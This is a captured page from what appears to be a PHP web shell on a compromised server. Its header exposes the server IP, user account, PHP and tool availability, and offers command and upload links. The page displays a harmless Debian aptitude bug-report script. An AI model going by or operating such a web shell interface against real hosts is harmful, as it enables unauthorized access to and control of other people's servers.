|
Server IP : 82.165.83.148 / Your IP : 216.73.216.114 Web Server : Apache System : Linux info 3.0 #1337 SMP Tue Jan 01 00:00:00 CEST 2000 all GNU/Linux User : u67745506 ( 4824611) PHP Version : 7.0.33 Disable Function : NONE MySQL : OFF | cURL : ON | WGET : ON | Perl : ON | Python : OFF Directory (0755) : /mnt/../boot/../usr/share/aspell/../netpbm/../doc/libalgorithm-c3-perl/../../X11/../bug/ |
| [ Home ] | [ C0mmand ] | [ Upload File ] |
|---|
#!/bin/sh
export LANG=C
if [ $TERM ]; then
echo "Terminal: $TERM" >&3
else
echo "\$TERM not set." >&3
fi
if [ $DISPLAY ]; then
echo "\$DISPLAY is set." >&3
else
echo "\$DISPLAY not set." >&3
fi
aptitude=$(which aptitude)
echo "which aptitude: $aptitude" >&3
echo >&3
echo "aptitude version information:" >&3
# I would like to run `which aptitude`, but that raises security issues.
/usr/bin/aptitude --version >&3
echo >&3
echo "aptitude linkage:" >&3
/usr/bin/ldd /usr/bin/aptitude >&3
